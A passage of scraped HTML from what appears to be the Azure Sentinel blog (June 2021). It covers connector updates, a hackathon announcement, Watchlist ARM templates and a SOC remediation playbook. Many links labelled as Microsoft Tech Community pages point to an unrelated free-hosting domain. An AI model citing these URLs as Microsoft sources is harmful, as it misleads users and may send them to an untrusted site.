(github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/azure-sentinel/linkedtemplates/data-collection-rules at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/azure-sentinel/linkedtemplates/data-collection-rules/rules at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/ossem-attack.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">References</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">XPath Tutorial (w3schools.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Configure data collection for the Azure Monitor agent (preview) - Azure Monitor | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rules in Azure Monitor (preview) - Azure Monitor | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Connect Windows security event data to Azure Sentinel (tabbed version) | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Connect Windows security event data to Azure Sentinel (tabbed version) | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Microsoft.Insights/dataCollectionRuleAssociations - ARM template reference | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/ask-the-directory-services-team/advanced-xml-filtering-in-the-windows-event-viewer/ba-p/399761" target="_blank" rel="noopener"><SPAN data-contrast="none">Advanced XML filtering in the Windows Event Viewer - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Consuming Events (Windows Event Log) - Win32 apps | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Monitor agent overview - Azure Monitor | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-monitor/a-powerful-agent-for-azure-monitor-and-a-simpler-world-of-data/ba-p/2443285" target="_blank" rel="noopener"><SPAN data-contrast="none">A powerful agent for Azure Monitor and a simpler world of data collection; now generally available! - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rules - REST API (Azure Monitor) | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rule Associations - REST API (Azure Monitor) | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">XML Path Language (XPath) (w3.org)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Managed identities for Azure resources | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Configure managed identities using the Azure portal - Azure AD | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> Fri, 25 Jun 2021 03:11:49 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/testing-the-new-version-of-the-windows-security-events-connector/ba-p/2483369 Cyb3rWard0g 2021-06-25T03:11:49Z Moving Azure Activity Connector to an improved method https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/moving-azure-activity-connector-to-an-improved-method/ba-p/2479552 <P>The Activity log is a&nbsp;<A href="#" target="_blank" rel="noopener">platform log</A>&nbsp;in Azure that provides insight into subscription-level events. This includes such information as when a resource is modified or when a virtual machine is started. You can view the Activity log in the Azure portal or retrieve entries with PowerShell and CLI. For additional functionality, you should create a diagnostic setting to send the Activity log to your Azure Sentinel.</P> <P>&nbsp;</P> <H2>&nbsp;</H2> <H2><STRONG>What changed?</STRONG></H2> <P>The Azure Activity connector used a legacy method for collecting Activity log events, prior to its adoption of the diagnostic settings pipeline. If you're using this legacy method, you are strongly encouraged to upgrade to the new pipeline, which provides better functionality and consistency with resource logs.</P> <P>Diagnostic settings send the same data as the legacy method used to send the Activity log with some changes to the structure of the&nbsp;<EM>AzureActivity</EM>&nbsp;table.</P> <P>The columns in the following table have been deprecated in the updated schema. They still exist in&nbsp;<EM>AzureActivity</EM>&nbsp;but they will have no data. The replacement for these columns are not new, but they contain the same data as the deprecated column. They are in a different format, so in the event, you have any private or internal content (such as hunting queries, analytics rules, workbooks, etc.) based on the deprecated columns, you may need to modify it and make sure that it points to the right columns.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ShaharAviv_0-1624519414672.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290874i4BEDFD34B9BB10FC/image-size/large?v=v2&amp;px=999" role="button" title="ShaharAviv_0-1624519414672.png" alt="ShaharAviv_0-1624519414672.png" /></span></P> <P>&nbsp;</P> <P>Here are some of the key improvements resulting from the move to the diagnostic settings pipeline:</P> <UL> <LI>Improved ingestion latency (event ingestion within 2-3 minutes of occurrence instead of 15-20 minutes).</LI> <LI>Improved reliability.</LI> <LI>Improved performance.</LI> <LI>Support for all categories of events logged by the Activity log service (the legacy mechanism supports only a subset - for example, no support for Service Health events).</LI> <LI>Management at scale with Azure policy.</LI> <LI>Support for MG-level activity logs (coming in preview now).</LI> </UL> <P>&nbsp;</P> <H2><STRONG>Set up the (new) Azure Activity connector</STRONG></H2> <P>The new Azure Activity connector includes two main steps- <EM>Disconnect</EM> the existing subscriptions from the legacy method, and then <EM>Connect</EM> all the relevant subscriptions to the new diagnostics settings pipeline via azure policy.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ShaharAviv_2-1624519414696.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290876i974B93C7D177A9DD/image-size/large?v=v2&amp;px=999" role="button" title="ShaharAviv_2-1624519414696.png" alt="ShaharAviv_2-1624519414696.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ShaharAviv_3-1624519414706.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290877iAB79F90203C733BE/image-size/large?v=v2&amp;px=999" role="button" title="ShaharAviv_3-1624519414706.png" alt="ShaharAviv_3-1624519414706.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Please go to <A href="#" target="_blank" rel="noopener">Connect Azure Activity log data to Azure Sentinel</A> to learn more about the new connector experience.</P> <P>&nbsp;</P> Thu, 24 Jun 2021 11:54:15 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/moving-azure-activity-connector-to-an-improved-method/ba-p/2479552 ShaharAviv 2021-06-24T11:54:15Z Join in the Azure Sentinel Hackathon 2021! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/join-in-the-azure-sentinel-hackathon-2021/ba-p/2466335 <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Hackathon Banner.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290300i484677F00D9DC095/image-size/large?v=v2&amp;px=999" role="button" title="Hackathon Banner.png" alt="Hackathon Banner.png" /></span></P> <P>&nbsp;</P> <P>Today, we are announcing the <A href="#" target="_blank" rel="noopener">2<SUP>nd</SUP> annual&nbsp;Hackathon for Azure Sentinel</A>! This hackathon challenges security experts around the globe to build end-to-end cybersecurity solutions for Azure Sentinel that delivers enterprise value by collecting data, managing security, detecting, hunting, investigating, and responding to constantly evolving threats. We invite you to participate in this hackathon for a chance to solve this challenge and win a piece of the $19000 cash prize pool*. This online hackathon runs from June 21<SUP>st</SUP> to Oct 4<SUP>th</SUP>, 2021, and is open to individuals, teams, and organizations globally.</P> <P><BR /><A href="#" target="_blank" rel="noopener">Azure Sentinel</A>&nbsp;provides a platform for security analysts and threat hunters of various levels to not only leverage existing content like workbooks (dashboard), playbooks (workflow orchestrations), analytic rules (detections), hunting queries, etc. but also <A href="#" target="_blank" rel="noopener">build custom content and solutions</A> &nbsp;as well. Furthermore, Azure Sentinel also provides <A href="#" target="_blank" rel="noopener">APIs</A> for integrating different types of applications to connect with Azure Sentinel data and insights.&nbsp;Here are few examples of end-to-end solutions that unlocks the potential of Azure Sentinel and drives enterprise value.</P> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">Azure Sentinel Solutions blogpost</A> provides examples of end-to-end solutions that deliver product and/or domain and/or industry vertical value.</LI> </UL> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-sigma-and-soc-prime-integration-part-1-convert/ba-p/1232903" target="_blank" rel="noopener">SOC Prime Sigma integration</A>&nbsp;provides an example of API integration.</LI> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-part1-a-lab-w-prerecorded-data-amp-a-custom/ba-p/1260191" target="_blank" rel="noopener">Azure Sentinel2Go lab</A>&nbsp;with pre-recorded data provides an example of a tool that enables easier onboarding to Azure Sentinel.&nbsp;</LI> </UL> <P>&nbsp;You can discover more examples by reviewing content and solutions in the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repo</A>&nbsp;and&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bg-p/AzureSentinelBlog" target="_blank" rel="noopener">blogs</A>. You can refer to the last year’s <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/announcing-the-azure-sentinel-hackathon-winners/ba-p/1548240" target="_blank" rel="noopener">Azure Sentinel Hackathon</A> for ideas too!</P> <P>&nbsp;</P> <H1>Prizes</H1> <P>In addition to learning more about Azure Sentinel and delivering cybersecurity value to enterprises, this hackathon offers the following awesome prizes for top projects:</P> <UL> <LI>First Place (1) - $10,000 USD cash prize &nbsp;</LI> <LI>Second Place (1) - $4000 USD cash prize</LI> <LI>Runners Up (2) - $1500 USD cash prize each&nbsp;</LI> <LI>Popular Choice (1) - $1000 USD cash prize</LI> <LI>The first 10 eligible submissions also qualify to receive $100 each.</LI> </UL> <P>Note<EM>: Refer to the </EM><A href="#" target="_blank" rel="noopener"><EM>Hackathon official rules</EM></A><EM> for details on project types that qualify for each prize category</EM></P> <P>In addition, the four winning projects will be heavily promoted on Microsoft blogs and social media so that your creative projects are widely known to all. The criteria for judging consist of quality of the idea, value to enterprise and technical implementation. Refer to the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Hackathon website</A>&nbsp;for further details and get started.</P> <P>&nbsp;</P> <H1>Judging Panel</H1> <P>Judging commences immediately after the hackathon submission window closes on October 4<SUP>th</SUP>, 2021. We’ll announce the winners on or before October 27<SUP>th</SUP>, 2021. Our judging panel currently includes the following influencers and experts in the cybersecurity community.</P> <UL> <LI>Ann Johnson - Corporate Vice President, Cybersecurity Solutions Group, Microsoft</LI> <LI>Vasu Jakkal - Corporate Vice President, Microsoft Security, Compliance and Identity</LI> <LI>John Lambert - Distinguished Engineer and General Manager, Microsoft Threat Intelligence Center</LI> <LI>Nick Lippis - Co-Founder, Co-Chair ONUG</LI> <LI>Andrii Bezverkhyi - CEO &amp; founder of SOC Prime, inventor of Uncoder.IO</LI> </UL> <P>&nbsp;</P> <H1>&nbsp;Next Steps</H1> <UL> <LI>Start by registering for this hackathon at the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Hackathon website</A>&nbsp;and invite your friends to join in the fun!</LI> <LI>Build your project by following the&nbsp;<A href="#" target="_blank" rel="noopener">Get Started guidance</A>. We have Azure credits for eligible participants to help you get started!</LI> <LI>Learn about&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel</A>&nbsp;and explore the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub</A>&nbsp;for inspiration.</LI> </UL> <P>Let the&nbsp;<STRONG>#AzureSecurityHackathon</STRONG>&nbsp;begin!</P> <P>&nbsp;</P> <P><EM>*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends October 4<SUP>th</SUP>, 2021 at 9:00 AM Pacific Time. Refer to the&nbsp;</EM><A href="#" target="_blank" rel="noopener"><EM>official rules</EM></A><EM>&nbsp;for details.&nbsp;</EM></P> <P>&nbsp;</P> Mon, 21 Jun 2021 16:20:53 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/join-in-the-azure-sentinel-hackathon-2021/ba-p/2466335 Preeti_Krishna 2021-06-21T16:20:53Z What's New: Azure Sentinel Watchlist Support for ARM Templates! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-watchlist-support-for-arm-templates/ba-p/2424429 <P>To add to the list of exciting announcements for Azure Sentinel, we are happy to announce that Watchlists now support ARM templates! Moving forward, users will be able to deploy Watchlists via ARM templates for quicker deployment scenarios as well as bulk deployments.</P> <P>&nbsp;</P> <P><STRONG>What Does It Look Like?</STRONG></P> <P>&nbsp;</P> <P>The template format is similar to regular ARM templates for Azure Sentinel. The template contains a few variables that are set upon creation and deployment:</P> <P>&nbsp;</P> <DIV> <DIV><SPAN>Workspace&nbsp;Name:&nbsp;The&nbsp;workspace&nbsp;name&nbsp;is&nbsp;required&nbsp;so&nbsp;that&nbsp;ARM&nbsp;knows&nbsp;the&nbsp;workspace&nbsp;that&nbsp;Azure&nbsp;Sentinel&nbsp;is&nbsp;using.&nbsp;This&nbsp;is&nbsp;used&nbsp;for&nbsp;deploying&nbsp;the&nbsp;content&nbsp;and&nbsp;function&nbsp;to&nbsp;the&nbsp;workspace.</SPAN></DIV> <BR /> <DIV><SPAN>Watchlist Name:&nbsp;Name&nbsp;for&nbsp;the&nbsp;Watchlist&nbsp;in&nbsp;both&nbsp;Azure&nbsp;Sentinel&nbsp;and&nbsp;in&nbsp;the&nbsp;workspace&nbsp;when&nbsp;calling&nbsp;it&nbsp;via the _getWatchlist function.&nbsp;This&nbsp;should&nbsp;reflect&nbsp;what&nbsp;the&nbsp;Watchlist&nbsp;is&nbsp;for.</SPAN></DIV> <BR /> <DIV><SPAN>SearchKey&nbsp;Value:&nbsp;Title&nbsp;of&nbsp;a&nbsp;column&nbsp;that&nbsp;will&nbsp;be&nbsp;used&nbsp;for&nbsp;performing&nbsp;lookups&nbsp;and&nbsp;joins&nbsp;with&nbsp;other&nbsp;tables.&nbsp;It&nbsp;is&nbsp;recommended&nbsp;to&nbsp;choose&nbsp;the column&nbsp;that&nbsp;will&nbsp;be&nbsp;the&nbsp;most&nbsp;used&nbsp;for&nbsp;joins&nbsp;and&nbsp;lookups.</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><SPAN>Watchlist Name and SearchKey should be set when creating the template as this value will be static. The name should reflect the purpose or topic of the Watchlist. The SearchKey is meant to be used as the reference column. The purpose of this column is to make lookups and joins more efficient. The section that those variables are set in appears as so:</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><LI-CODE lang="json">name": "[concat(parameters('workspaceName'), &lt;-- set at deployment '/Microsoft.SecurityInsights/PUTWATCHLISTNAMEHERE')]", "type": "Microsoft.OperationalInsights/workspaces/providers/Watchlists", "kind": "", "properties": { "displayName": "PUTWATCHLISTNAMEHRE", "source": "PUTWATCHLISTNAMEHERE.csv", "description": "This is a sample Watchlist description.", "provider": "Custom", "isDeleted": false, "labels": [ ], "defaultDuration": "P1000Y", "contentType": "Text/Csv", "numberOfLinesToSkip": 0, "itemsSearchKey": "PUTSEARCHKEYVALUEHERE",</LI-CODE></DIV> <DIV>&nbsp;</DIV> <DIV>Within the body is the content that would normally be found within the CSV file that is uploaded to Azure Sentinel. This data is found under "rawContent".</DIV> <DIV>&nbsp;</DIV> <DIV> <DIV> <DIV><SPAN>For&nbsp;the&nbsp;content&nbsp;of&nbsp;the&nbsp;csv&nbsp;that&nbsp;will&nbsp;be&nbsp;generated,&nbsp;the&nbsp;columns&nbsp;and&nbsp;values&nbsp;must&nbsp;be&nbsp;specified.&nbsp;The&nbsp;columns&nbsp;will&nbsp;appear&nbsp;first,&nbsp;followed&nbsp;by&nbsp;the&nbsp;data.&nbsp;An&nbsp;example&nbsp;appears&nbsp;as&nbsp;so:</SPAN></DIV> </DIV> <DIV><LI-CODE lang="json">"rawContent":&nbsp;"SEARCHKEYCOLUMN,SampleColumn1,SampleColumn2\r\n &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Samplevalue1,samplevalue2,samplevalue3\r\nsamplevalue4,samplevalue5,samplevalue6\r\n" ​</LI-CODE><BR /> <DIV><SPAN>The&nbsp;columns&nbsp;that&nbsp;should&nbsp;be&nbsp;used&nbsp;are&nbsp;listed&nbsp;first in this example (SearchKey,&nbsp;SampleColumn1,&nbsp;SampleColumn2).&nbsp;Once&nbsp;the&nbsp;columns&nbsp;are&nbsp;listed,&nbsp;"\r\n"&nbsp;needs&nbsp;to&nbsp;be&nbsp;used&nbsp;to&nbsp;signal&nbsp;that&nbsp;a&nbsp;new&nbsp;row&nbsp;needs&nbsp;to&nbsp;be&nbsp;started.&nbsp;This&nbsp;is&nbsp;used&nbsp;throughout&nbsp;the&nbsp;template. This lets ARM know that the row has ended and the next row of the CSV should begin.</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><SPAN>Note: The column being used for the SearchKey does not always need to be listed first.</SPAN></DIV> <BR /> <DIV><SPAN>When&nbsp;it&nbsp;comes&nbsp;to&nbsp;values&nbsp;that&nbsp;should&nbsp;be&nbsp;under&nbsp;the&nbsp;column,&nbsp;each&nbsp;value&nbsp;should&nbsp;be&nbsp;separated&nbsp;by&nbsp;a&nbsp;comma.&nbsp;</SPAN><SPAN>The&nbsp;comma&nbsp;is&nbsp;interpreted&nbsp;as&nbsp;the&nbsp;end&nbsp;of&nbsp;that&nbsp;cell.&nbsp;As&nbsp;shown&nbsp;in&nbsp;the&nbsp;example,&nbsp;samplevalue1&nbsp;is&nbsp;one&nbsp;cell,&nbsp;samplevalue2&nbsp;is&nbsp;a&nbsp;different&nbsp;cell.&nbsp;When&nbsp;all of the&nbsp;values&nbsp;have&nbsp;been&nbsp;added&nbsp;for&nbsp;the&nbsp;row,&nbsp;\r\n&nbsp;needs&nbsp;to&nbsp;be&nbsp;used&nbsp;in&nbsp;order&nbsp;to&nbsp;start&nbsp;the&nbsp;next&nbsp;row.</SPAN></DIV> <BR /> <DIV><SPAN>An&nbsp;example&nbsp;of&nbsp;how&nbsp;that&nbsp;might&nbsp;look&nbsp;would&nbsp;be:</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><LI-CODE lang="json">"rawContent":&nbsp;"SEARCHKEYCOLUMN, Account,&nbsp;Machine\r\n123.456.789.1,&nbsp;Admin,&nbsp;ContosoMachine1\r\n &nbsp;&nbsp;&nbsp;&nbsp;123.456.789.2,&nbsp;LocalUser,&nbsp;ContosoMachine2\r\n"</LI-CODE></DIV> <SPAN>Note: These values are space sensitive. If spaces are not needed, please avoid using them as it could lead to inaccurate values.</SPAN></DIV> <DIV><BR /> <DIV><SPAN>This&nbsp;example&nbsp;shows&nbsp;that&nbsp;the&nbsp;columns&nbsp;will be&nbsp;an&nbsp;IP&nbsp;(used&nbsp;as&nbsp;the&nbsp;search&nbsp;key&nbsp;value),&nbsp;an&nbsp;account,&nbsp;and&nbsp;a&nbsp;machine.&nbsp;The&nbsp;rows&nbsp;below&nbsp;the&nbsp;columns&nbsp;will&nbsp;contain&nbsp;those&nbsp;types&nbsp;of&nbsp;values&nbsp;in&nbsp;the&nbsp;CSV&nbsp;file.&nbsp;In this&nbsp;case,&nbsp;the&nbsp;CSV&nbsp;will&nbsp;only&nbsp;have&nbsp;3&nbsp;columns&nbsp;and&nbsp;2&nbsp;rows&nbsp;of&nbsp;data.</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><STRONG>Use Cases:</STRONG></DIV> <DIV>&nbsp;</DIV> <DIV>ARM template deployments will provide the most value when looking to deploy Watchlists in bulk or along with other items. For example, deploying a Watchlist upon the creation of a custom analytic rule, deploying a Watchlist based on TI posted by Microsoft, and more.</DIV> <DIV>&nbsp;</DIV> <DIV>As an example, an <A href="#" target="_self">ARM template</A> has been posted within the Azure Sentinel GitHub that lists the Azure Public IPs. These IPs can be found online and downloaded but in this case, the IPs are ready to be deployed as a Watchlist for usage. This Watchlist can then be used to lower false positives for detections that pick up the IP or to be used as enrichment data for investigating activities within the environment. Additionally, a <A href="#" target="_self">template</A> that consists of threat intelligence from the Microsoft Threat Intelligence Research Center for the recent NOBELIUM attacks has been posted within the GitHub for usage. This template allows for a file upload of threat intelligence without having to manually type each value into a CSV or the Azure portal.</DIV> <DIV>&nbsp;</DIV> <DIV>To help users get started, a <A href="#" target="_self">Watchlist template example</A> has been posted within GitHub for reference. This template is meant to serve as the building block for custom templates and can be used as needed.</DIV> <P>&nbsp;</P> <P>Time to get creative and start building custom Watchlists today!</P> </DIV> </DIV> </DIV> Wed, 16 Jun 2021 21:22:34 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-watchlist-support-for-arm-templates/ba-p/2424429 Matt_Lowe 2021-06-16T21:22:34Z Enhanced Azure Sentinel Alert remediation in the SOC Process Framework https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/enhanced-azure-sentinel-alert-remediation-in-the-soc-process/ba-p/2452430 <P>Microsoft’s Azure Sentinel now provides a Timeline view within the Incident where alerts now display remediation steps. The list of alerts that have remediations provided by Microsoft will continue to grow. As you can see in the graphic below, one or more remediation steps are contained in each alert. These remediation steps tell you what to do with the alert or Incident in question.&nbsp;</P> <P>&nbsp;</P> <P><STRONG>However, what if you want to have your own steps, or what if you have alerts without any remediation steps?</STRONG></P> <P>&nbsp;</P> <P>Now available to address this is the Get-SOCActions Playbook found in GitHub (<A href="#" target="_blank" rel="noopener">Azure-Sentinel/Playbooks/Get-SOCActions at master · Azure/Azure-Sentinel (github.com)</A>). This playbook uses a .csv file uploaded your Azure Sentinel instance, as a Watchlist containing the steps your organization wants an analyst to take to remediate the Incident they are triaging. More on this in a minute.</P> <P><BR />Below is an example of a provided Remediation from one of the Alerts:</P> <P>&nbsp;</P> <P><STRONG>Example Remediation Steps Provided by Microsoft</STRONG></P> <OL> <LI>Enforce the use of strong passwords and do not re-use them across multiple resources and services</LI> <LI>In case this is an Azure Virtual Machine, set up an NSG allow list of only expected IP addresses or ranges. (see <A href="#" target="_blank" rel="noopener">https://azure.microsoft.com/en-us/documentation/articles/virtual-networks-nsg/</A>)</LI> <LI>In case this is an Azure Virtual Machine, lock down access to it using network JIT (see <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/security-center/security-center-just-in-time</A>)</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture1.png" style="width: 404px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289067i0D90941E59E919D3/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.png" alt="Picture1.png" /></span></P> <P><EM>Remediation steps were added to the Timeline View recently in Azure Sentinel, as shown above</EM></P> <P>&nbsp;</P> <P>We highly encourage you to look at the <A href="https://gorovian.000webhostapp.com/?exam=Remediation%20steps%20were%20added%20to%20the%20Timeline%20View%20recently%20in%20Azure%20Sentinel,%20shown%20here:" target="_blank" rel="noopener">SOC Process Framework blog</A>, Playbook and the amazing Workbook; you may have already noticed the SocRA Watchlist which was called out in that article, it is a .csv file that Rin published, and is the template you need to build your own steps (or just use the enhanced ones provided by Rin).&nbsp;</P> <P>It’s this .csv file that creates the Watchlist that forms the basis of enhancing your SOC process for remediation, its used in the Workbook and Playbook.&nbsp; The .csv file has been used as it’s an easy to edit format (in Excel or Notepad etc…), you just need to amend the rows or even add your own rows and columns for new Alerts or steps you would like.&nbsp; There are columns called <STRONG>A</STRONG>1, <STRONG>A</STRONG>2 &nbsp;etc… these are essentially <STRONG>A</STRONG>nswer1 (Step1), <STRONG>A</STRONG>nswer 2(Step2) etc…<BR />Example of a new Alert that has been added. <BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture2.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289069i526143045D2EE47E/image-size/large?v=v2&amp;px=999" role="button" title="Picture2.png" alt="Picture2.png" /></span></P> <P>You can also in the last column add a DATE (of when the line in the watchlist was <EM>updated</EM>). Note that any URL link will appear its own column in the [Incident Overview] workbook – we parse the string so it can be part of a longer line of text in any of the columns headed <STRONG>A</STRONG>1 thru <STRONG>A</STRONG>19 (you can add more answers if required, just inset more columns named A20, A21 etc…after column A19).&nbsp; Just remember to save your work as a .CSV.</P> <P>&nbsp;</P> <H3>How to install the Watchlist file<BR /><BR />You must download the Watchlist file (then edit as required) it’s called SOCAnalystActionsByAlert.csv (<A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/docs/SOCAnalystActionsByAlert.csv</A>)</H3> <P>Then when you name the Watchlist, our suggestion is “SOC Recommended Actions”, make sure you set the ‘Alias’ to: <STRONG>SocRA</STRONG></P> <P>Important: 